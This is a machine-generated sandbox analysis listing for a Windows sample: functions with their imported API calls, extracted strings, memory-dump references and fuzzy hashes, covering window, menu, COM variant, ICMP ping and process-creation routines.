API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit__invoke_watson_memset
String ID:
API String ID: 384356119-0
Opcode ID: 85949ae18b549cd2d12431497598bef6b028e5a4746e3945652a320069ef6a5a
Instruction ID: a894b1b025fa0eb56b5d975a28b471de4d193b92b34753072ea5fa52b6b18987
Opcode Fuzzy Hash: 85949ae18b549cd2d12431497598bef6b028e5a4746e3945652a320069ef6a5a
Instruction Fuzzy Hash: 8A7116B1A09716ABD7149E79EC41B9AB3E8AF50328F10523AF854F7681E770D94487D0

Function 00E82A16 Relevance: 16.7, APIs: 11, Instructions: 190windowsleepCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00E82A31
GetMenuItemInfoW.USER32(00EE6890,000000FF,00000000,00000030), ref: 00E82A92
SetMenuItemInfoW.USER32(00EE6890,00000004,00000000,00000030), ref: 00E82AC8
Sleep.KERNEL32(000001F4), ref: 00E82ADA
GetMenuItemCount.USER32(?), ref: 00E82B1E
GetMenuItemID.USER32(?,00000000), ref: 00E82B3A
GetMenuItemID.USER32(?,-00000001), ref: 00E82B64
GetMenuItemID.USER32(?,?), ref: 00E82BA9
CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00E82BEF
GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00E82C03
SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00E82C24

Memory Dump Source

Source File: 00000000.00000002.2041939352.0000000000E21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000000.00000002.2041919954.0000000000E20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000EAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000ED5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042029255.0000000000EDF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042045927.0000000000EE8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e20000_LisectAVT_2403002B_466.jbxd

Similarity

API ID: ItemMenu$Info$CheckCountRadioSleep_memset
String ID:
API String ID: 4176008265-0
Opcode ID: 5c9a8d49f0267b6eb7271fc926a6f106cb9e748e40cf8ec7498252765432fc60
Instruction ID: 485f1e505b37b539ced63149ec359ff16ab6c54f1847709acd7f0c23d26c5d97
Opcode Fuzzy Hash: 5c9a8d49f0267b6eb7271fc926a6f106cb9e748e40cf8ec7498252765432fc60
Instruction Fuzzy Hash: C661D0B0901249AFDB21EFA4C888DBEBBB8EF05308F14555DFA49B7261D731AD05DB20

Function 00EA7192 Relevance: 16.7, APIs: 11, Instructions: 184windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 00EA7214
SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 00EA7217
GetWindowLongW.USER32(?,000000F0), ref: 00EA723B
_memset.LIBCMT ref: 00EA724C
SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00EA725E
SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 00EA72D6

Memory Dump Source

Source File: 00000000.00000002.2041939352.0000000000E21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000000.00000002.2041919954.0000000000E20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000EAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000ED5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042029255.0000000000EDF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042045927.0000000000EE8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e20000_LisectAVT_2403002B_466.jbxd

Similarity

API ID: MessageSend$LongWindow_memset
String ID:
API String ID: 830647256-0
Opcode ID: c9781f85b047c16615dc54eb70de8a0a9bd75142a423a9c48f1c165fd7393df6
Instruction ID: 6e3ae2701c8913fe5e132e9125d5669c2bcb53243b7166effaf2cbca5e34b27d
Opcode Fuzzy Hash: c9781f85b047c16615dc54eb70de8a0a9bd75142a423a9c48f1c165fd7393df6
Instruction Fuzzy Hash: A4617A75A00248AFDB10DFA4CC81EEE77F8AB0E704F141169FA54BB2A1D770AD45DBA0

Function 00E7710E Relevance: 16.6, APIs: 11, Instructions: 123memoryCOMMON

Download Yara Rule

APIs

SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 00E77135
SafeArrayAllocData.OLEAUT32(?), ref: 00E7718E
VariantInit.OLEAUT32(?), ref: 00E771A0
SafeArrayAccessData.OLEAUT32(?,?), ref: 00E771C0
VariantCopy.OLEAUT32(?,?), ref: 00E77213
SafeArrayUnaccessData.OLEAUT32(?), ref: 00E77227
VariantClear.OLEAUT32(?), ref: 00E7723C
SafeArrayDestroyData.OLEAUT32(?), ref: 00E77249
SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00E77252
VariantClear.OLEAUT32(?), ref: 00E77264
SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00E7726F

Memory Dump Source

Source File: 00000000.00000002.2041939352.0000000000E21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000000.00000002.2041919954.0000000000E20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000EAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000ED5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042029255.0000000000EDF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042045927.0000000000EE8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e20000_LisectAVT_2403002B_466.jbxd

Similarity

API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
String ID:
API String ID: 2706829360-0
Opcode ID: 0d26ee36f25c92fa7e9c178a229e1285bf5dca66cfe1386b98c2fe22cd0050a1
Instruction ID: 79deb15bf2e0393aa71df994f85a377b2ea0f7164bdaea34e55f700800526a22
Opcode Fuzzy Hash: 0d26ee36f25c92fa7e9c178a229e1285bf5dca66cfe1386b98c2fe22cd0050a1
Instruction Fuzzy Hash: 22415075A04219AFCF04DFA5D8449AEBBB8FF0C354F00D069F9A5B7261DB30A945CB90

Function 00E95A45 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 163networkfileCOMMON

Download Yara Rule

APIs

WSAStartup.WSOCK32(00000101,?), ref: 00E95AA6
inet_addr.WSOCK32(?,?,?), ref: 00E95AEB
gethostbyname.WSOCK32(?), ref: 00E95AF7
IcmpCreateFile.IPHLPAPI ref: 00E95B05
IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 00E95B75
IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 00E95B8B
IcmpCloseHandle.IPHLPAPI(00000000), ref: 00E95C00
WSACleanup.WSOCK32 ref: 00E95C06

Strings

Ping, xrefs: 00E95B29

Memory Dump Source

Source File: 00000000.00000002.2041939352.0000000000E21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000000.00000002.2041919954.0000000000E20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000EAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000ED5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042029255.0000000000EDF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042045927.0000000000EE8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e20000_LisectAVT_2403002B_466.jbxd

Similarity

API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
String ID: Ping
API String ID: 1028309954-2246546115
Opcode ID: 7c2327b4080e7ed7363196da46388b6dff11ee63112eb0637edabbb464c9287e
Instruction ID: f8287182f4a3cebf273b201b3b65b7747ac9775321c3d8c59a30b4408ee5c504
Opcode Fuzzy Hash: 7c2327b4080e7ed7363196da46388b6dff11ee63112eb0637edabbb464c9287e
Instruction Fuzzy Hash: 0251A0326047009FDB11EF25DC45B6AB7E0EF48314F14A92AF959FB2A1EB70E844CB45

Function 00E8B72E Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 98COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 00E8B73B
GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 00E8B7B1
GetLastError.KERNEL32 ref: 00E8B7BB
SetErrorMode.KERNEL32(00000000,READY), ref: 00E8B828

Strings

INVALID, xrefs: 00E8B7FA
READONLY, xrefs: 00E8B7F3
READY, xrefs: 00E8B801
UNKNOWN, xrefs: 00E8B7E0
NOTREADY, xrefs: 00E8B7E7

Memory Dump Source

Source File: 00000000.00000002.2041939352.0000000000E21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000000.00000002.2041919954.0000000000E20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000EAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000ED5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042029255.0000000000EDF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042045927.0000000000EE8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e20000_LisectAVT_2403002B_466.jbxd

Similarity

API ID: Error$Mode$DiskFreeLastSpace
String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
API String ID: 4194297153-14809454
Opcode ID: ee34fa298b19374201eaa6a069d3f8d2e28e149a48744122ab7d90f014033c3a
Instruction ID: 06b6176c2dc1590a848bb7c6313104c351ffa98293bd1ed6eb3677e0e63d187a
Opcode Fuzzy Hash: ee34fa298b19374201eaa6a069d3f8d2e28e149a48744122ab7d90f014033c3a
Instruction Fuzzy Hash: 1931A135A003059FDB14FF64D885AAE7BB4EF48704F14612AF80DF7292DB72AA46C751

Function 00E79471 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 82windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00E27F41: _memmove.LIBCMT ref: 00E27F82

Part of subcall function 00E7B0C4: GetClassNameW.USER32(?,?,000000FF), ref: 00E7B0E7

SendMessageW.USER32(?,0000018C,000000FF,00000002), ref: 00E794F6
GetDlgCtrlID.USER32 ref: 00E79501
GetParent.USER32 ref: 00E7951D
SendMessageW.USER32(00000000,?,00000111,?), ref: 00E79520
GetDlgCtrlID.USER32(?), ref: 00E79529
GetParent.USER32(?), ref: 00E79545
SendMessageW.USER32(00000000,?,?,00000111), ref: 00E79548

Strings

ListBox, xrefs: 00E794B3
ComboBox, xrefs: 00E7947E

Memory Dump Source

Source File: 00000000.00000002.2041939352.0000000000E21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000000.00000002.2041919954.0000000000E20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000EAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000ED5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042029255.0000000000EDF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042045927.0000000000EE8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e20000_LisectAVT_2403002B_466.jbxd

Similarity

API ID: MessageSend$CtrlParent$ClassName_memmove
String ID: ComboBox$ListBox
API String ID: 1536045017-1403004172
Opcode ID: 2c1ba2dcf7e85c57288bc03ae29ff1c2a7065defcec33365abed01f45c1cd876
Instruction ID: dfd11182ec3c86c785e234c24c6b096e00101bf2bfd28bad5b15eb5f495e976a
Opcode Fuzzy Hash: 2c1ba2dcf7e85c57288bc03ae29ff1c2a7065defcec33365abed01f45c1cd876
Instruction Fuzzy Hash: C621F470A00204BFCF00ABA1CC85EFEBBB5EF89300F105126F561B72A2DB755919DB60

Function 00E7955C Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 81windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00E27F41: _memmove.LIBCMT ref: 00E27F82

Part of subcall function 00E7B0C4: GetClassNameW.USER32(?,?,000000FF), ref: 00E7B0E7

SendMessageW.USER32(?,00000186,00000002,00000000), ref: 00E795DF
GetDlgCtrlID.USER32 ref: 00E795EA
GetParent.USER32 ref: 00E79606
SendMessageW.USER32(00000000,?,00000111,?), ref: 00E79609
GetDlgCtrlID.USER32(?), ref: 00E79612
GetParent.USER32(?), ref: 00E7962E
SendMessageW.USER32(00000000,?,?,00000111), ref: 00E79631

Strings

ListBox, xrefs: 00E7959E
ComboBox, xrefs: 00E79569

Memory Dump Source

Source File: 00000000.00000002.2041939352.0000000000E21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000000.00000002.2041919954.0000000000E20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000EAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000ED5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042029255.0000000000EDF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042045927.0000000000EE8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e20000_LisectAVT_2403002B_466.jbxd

Similarity

API ID: MessageSend$CtrlParent$ClassName_memmove
String ID: ComboBox$ListBox
API String ID: 1536045017-1403004172
Opcode ID: 1104c8c610725e6ab81bf9626795dd43daa02057ea961c0b20f77bb299f2cf39
Instruction ID: 9d0b8dff1a445041bc4e9c9fb90796197361d381f50ab37b7e2ef799e4a4678c
Opcode Fuzzy Hash: 1104c8c610725e6ab81bf9626795dd43daa02057ea961c0b20f77bb299f2cf39
Instruction Fuzzy Hash: 0E21D370A00204BFDF00ABA1CC85EFEBBB8EF49300F105116F951B72A2DB7599199B60

Function 00E79645 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 72windowCOMMON

Download Yara Rule

APIs

GetParent.USER32 ref: 00E79651
GetClassNameW.USER32(00000000,?,00000100), ref: 00E79666
_wcscmp.LIBCMT ref: 00E79678
SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 00E796F3

Strings

largeicons, xrefs: 00E79687
smallicons, xrefs: 00E796BB
details, xrefs: 00E796A1
SHELLDLL_DefView, xrefs: 00E79672
list, xrefs: 00E796D5

Memory Dump Source

Source File: 00000000.00000002.2041939352.0000000000E21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000000.00000002.2041919954.0000000000E20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000EAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000ED5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042029255.0000000000EDF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042045927.0000000000EE8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e20000_LisectAVT_2403002B_466.jbxd

Similarity

API ID: ClassMessageNameParentSend_wcscmp
String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
API String ID: 1704125052-3381328864
Opcode ID: 45a9f9aa247da64a9f10fa1491a7e60ba57bbb3e70d74f3ccf67e87862496384
Instruction ID: e4a2e900512a534d933bc84bcbe342e7b925021554828292e6800113019a544d
Opcode Fuzzy Hash: 45a9f9aa247da64a9f10fa1491a7e60ba57bbb3e70d74f3ccf67e87862496384
Instruction Fuzzy Hash: B6110676248307BAFA012671FC0ADE6B79CDF05364F206227FA04F51D3FEA269114A98

Function 00E84189 Relevance: 15.1, APIs: 10, Instructions: 108windowCOMMON

Download Yara Rule

APIs

__swprintf.LIBCMT ref: 00E8419D
__swprintf.LIBCMT ref: 00E841AA

Part of subcall function 00E438D8: __woutput_l.LIBCMT ref: 00E43931

FindResourceW.KERNEL32(?,?,0000000E), ref: 00E841D4
LoadResource.KERNEL32(?,00000000), ref: 00E841E0
LockResource.KERNEL32(00000000), ref: 00E841ED
FindResourceW.KERNEL32(?,?,00000003), ref: 00E8420D
LoadResource.KERNEL32(?,00000000), ref: 00E8421F
SizeofResource.KERNEL32(?,00000000), ref: 00E8422E
LockResource.KERNEL32(?), ref: 00E8423A
CreateIconFromResourceEx.USER32(?,?,00000001,00030000,00000000,00000000,00000000), ref: 00E8429B

Memory Dump Source

Source File: 00000000.00000002.2041939352.0000000000E21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000000.00000002.2041919954.0000000000E20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000EAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000ED5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042029255.0000000000EDF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042045927.0000000000EE8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e20000_LisectAVT_2403002B_466.jbxd

Similarity

API ID: Resource$FindLoadLock__swprintf$CreateFromIconSizeof__woutput_l
String ID:
API String ID: 1433390588-0
Opcode ID: 063d7f1cff4c54d90771a11ba495adfce51f6b56f174057720a0bfd3861ec381
Instruction ID: 7ae5e00f1f30378ce05774b627c8aedadf230528ea4a37759124c21639f21177
Opcode Fuzzy Hash: 063d7f1cff4c54d90771a11ba495adfce51f6b56f174057720a0bfd3861ec381
Instruction Fuzzy Hash: CD3180B160521AAFDB11AFA1EC48EBB7BACEF09305F004525F909F61A0D730DA559BB0

Function 00E816DE Relevance: 15.1, APIs: 10, Instructions: 89threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 00E81700
GetForegroundWindow.USER32(00000000,?,?,?,?,?,00E80778,?,00000001), ref: 00E81714
GetWindowThreadProcessId.USER32(00000000), ref: 00E8171B
AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00E80778,?,00000001), ref: 00E8172A
GetWindowThreadProcessId.USER32(?,00000000), ref: 00E8173C
AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00E80778,?,00000001), ref: 00E81755
AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00E80778,?,00000001), ref: 00E81767
AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,00E80778,?,00000001), ref: 00E817AC
AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,?,00E80778,?,00000001), ref: 00E817C1
AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,?,00E80778,?,00000001), ref: 00E817CC

Memory Dump Source

Source File: 00000000.00000002.2041939352.0000000000E21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000000.00000002.2041919954.0000000000E20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000EAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000ED5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042029255.0000000000EDF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042045927.0000000000EE8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e20000_LisectAVT_2403002B_466.jbxd

Similarity

API ID: Thread$AttachInput$Window$Process$CurrentForeground
String ID:
API String ID: 2156557900-0
Opcode ID: d5d2fbe414e43c9b625b7ff24384a148b0fa8143945afc61b5a6d891f40ad6e4
Instruction ID: 1fd327694fbf1daaf04338aab2a66f34b03ab31bf034fff38708a43017587857
Opcode Fuzzy Hash: d5d2fbe414e43c9b625b7ff24384a148b0fa8143945afc61b5a6d891f40ad6e4
Instruction Fuzzy Hash: 1B31B175600208BFEB21AF56DC84F6937EDAB5A715F10409AF80CFA2A0D7B5AD49CB50

Function 00E99428 Relevance: 14.3, APIs: 5, Strings: 3, Instructions: 263COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00E9947C
VariantInit.OLEAUT32(?), ref: 00E9954D
VariantInit.OLEAUT32(?), ref: 00E9964E
VariantClear.OLEAUT32(?), ref: 00E99658
VariantClear.OLEAUT32(?), ref: 00E996B5

Strings

,,, xrefs: 00E994FA
Incorrect Object type in FOR..IN loop, xrefs: 00E99631
Null Object assignment in FOR..IN loop, xrefs: 00E994DD, 00E9960B, 00E996C3

Memory Dump Source

Source File: 00000000.00000002.2041939352.0000000000E21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000000.00000002.2041919954.0000000000E20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000EAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000ED5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042029255.0000000000EDF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042045927.0000000000EE8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e20000_LisectAVT_2403002B_466.jbxd

Similarity

API ID: Variant$ClearInit$_memset
String ID: ,,$Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
API String ID: 2862541840-218231672
Opcode ID: ed4d622acc44fb8088d45e3a80c18c2a4c3bd18b3e062fac4b352b47095c599e
Instruction ID: c9b353f3c89594f7310a481ccb60dbd9736cc5378066ff47315472bdc74dbf1d
Opcode Fuzzy Hash: ed4d622acc44fb8088d45e3a80c18c2a4c3bd18b3e062fac4b352b47095c599e
Instruction Fuzzy Hash: DF919C71A00215ABDF24DFA9C844FAEBBB8EF85314F10915EF515BB282D7709905CFA0

Function 00E7A693 Relevance: 14.2, APIs: 2, Strings: 6, Instructions: 241COMMON

Download Yara Rule

APIs

EnumChildWindows.USER32(?,00E7AA64), ref: 00E7A9A2

Strings

TEXT, xrefs: 00E7A8D9
REGEXPCLASS, xrefs: 00E7A767
CLASS, xrefs: 00E7A721
CLASSNN, xrefs: 00E7A744
INSTANCE, xrefs: 00E7A8B0
NAME, xrefs: 00E7A7D4

Memory Dump Source

Source File: 00000000.00000002.2041939352.0000000000E21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000000.00000002.2041919954.0000000000E20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000EAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000ED5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042029255.0000000000EDF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042045927.0000000000EE8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e20000_LisectAVT_2403002B_466.jbxd

Similarity

API ID: ChildEnumWindows
String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
API String ID: 3555792229-1603158881
Opcode ID: 9d54a6bbab8c5af6e988a479ca86d9cd00155a6b86f989e3e8c7cc73e35729f8
Instruction ID: 19bd64230292523f99e4817be3051843748ddb50b1006066455c9c3587008916
Opcode Fuzzy Hash: 9d54a6bbab8c5af6e988a479ca86d9cd00155a6b86f989e3e8c7cc73e35729f8
Instruction Fuzzy Hash: 0D918430900206ABDB08DF60D482BEDFBB5BF84304F18E13AE59DB7151DB30A95ACB91

Function 00E22E26 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 186windowCOMMON

Download Yara Rule

APIs

SetWindowLongW.USER32(?,000000EB), ref: 00E22EAE

Part of subcall function 00E21DB3: GetClientRect.USER32(?,?), ref: 00E21DDC
Part of subcall function 00E21DB3: GetWindowRect.USER32(?,?), ref: 00E21E1D
Part of subcall function 00E21DB3: ScreenToClient.USER32(?,?), ref: 00E21E45

GetDC.USER32 ref: 00E5CF82
SendMessageW.USER32(?,00000031,00000000,00000000), ref: 00E5CF95
SelectObject.GDI32(00000000,00000000), ref: 00E5CFA3
SelectObject.GDI32(00000000,00000000), ref: 00E5CFB8
ReleaseDC.USER32(?,00000000), ref: 00E5CFC0
MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 00E5D04B

Strings

U, xrefs: 00E5CF20

Memory Dump Source

Source File: 00000000.00000002.2041939352.0000000000E21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000000.00000002.2041919954.0000000000E20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000EAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000ED5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042029255.0000000000EDF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042045927.0000000000EE8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e20000_LisectAVT_2403002B_466.jbxd

Similarity

API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
String ID: U
API String ID: 4009187628-3372436214
Opcode ID: 0853a77c5867c51c901d190e431d3a6d69908e2a0cc3c6192c2d6e56a20590d2
Instruction ID: a8632df225dca73b083f990b154f04ef4cfa14b99fa6e09bb0110fbf6bdd49c0
Opcode Fuzzy Hash: 0853a77c5867c51c901d190e431d3a6d69908e2a0cc3c6192c2d6e56a20590d2
Instruction Fuzzy Hash: 6571E230500209EFCF318F64CC90AEA3BB6FF49359F24666AED557A2A5C7319C49DB60

Function 00E98F5B Relevance: 13.9, APIs: 9, Instructions: 438COMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32(?,?,00000104,?,00EAF910), ref: 00E9903D
FreeLibrary.KERNEL32(00000000,00000001,00000000,?,00EAF910), ref: 00E99071
QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 00E991EB
SysFreeString.OLEAUT32(?), ref: 00E99215

Memory Dump Source

Source File: 00000000.00000002.2041939352.0000000000E21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000000.00000002.2041919954.0000000000E20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000EAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000ED5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042029255.0000000000EDF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042045927.0000000000EE8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e20000_LisectAVT_2403002B_466.jbxd

Similarity

API ID: Free$FileLibraryModuleNamePathQueryStringType
String ID:
API String ID: 560350794-0
Opcode ID: 77a2ed9f05dfb111869077165a2c426ff84fbd4e8de880e5a0dc006e84567084
Instruction ID: 45a07c10166579ea8587fedd08c5212b877e7d893897aa7532e02faf356dd273
Opcode Fuzzy Hash: 77a2ed9f05dfb111869077165a2c426ff84fbd4e8de880e5a0dc006e84567084
Instruction Fuzzy Hash: 58F12771A00209EFDF14DF98C888EAEB7B9FF49315F109059F915AB292DB31AE45CB50

Function 00E9F9A8 Relevance: 13.9, APIs: 9, Instructions: 386processCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00E9F9C9
GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00E9FB5C
GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00E9FB80
GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00E9FBC0
GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00E9FBE2
CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00E9FD5E
GetLastError.KERNEL32(00000000,00000001,00000000), ref: 00E9FD90
CloseHandle.KERNEL32(?), ref: 00E9FDBF
CloseHandle.KERNEL32(?), ref: 00E9FE36

Memory Dump Source

Source File: 00000000.00000002.2041939352.0000000000E21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E20000, based on PE: true

